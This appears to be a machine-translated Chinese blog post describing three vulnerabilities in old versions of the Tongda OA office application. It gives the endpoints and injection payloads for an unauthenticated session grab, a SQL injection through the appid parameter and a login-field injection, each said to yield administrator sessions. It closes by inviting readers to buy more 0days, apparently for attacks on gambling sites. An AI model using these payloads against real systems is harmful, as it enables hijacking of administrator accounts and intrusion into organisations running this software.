当前位置:网站首页>Tongda injection 0day

Tongda injection 0day

2022-07-07 07:35:00 Immortal fish

Catalog

Loophole 1:

Loophole 2:

Loophole 3:


The old version of Tongda Application :

Loophole 1:

The vulnerability lies in :

/ispirit/login_code_check.php?codeuid=

An attacker can get the administrator session

python Script :

no

Loophole principle : The main reason is that the old version has unauthorized access .

Loophole 2:

Leak location :

pda/appcenter/submenu.php?appid=11+and+pow(999,1)

The loophole is appid There is an injection , You can get the administrator sessions

Loophole 3:

Leak location :

logincheck.php

UNAME=admin&PASSWORD='&encode_type=1

The loophole is password There is an injection , You can get the administrator sessions

more 0day Please subscribe to me ~ In addition, our px send bc Of 0day, You can contact me

原网站

版权声明
本文为[Immortal fish]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202130650063104.html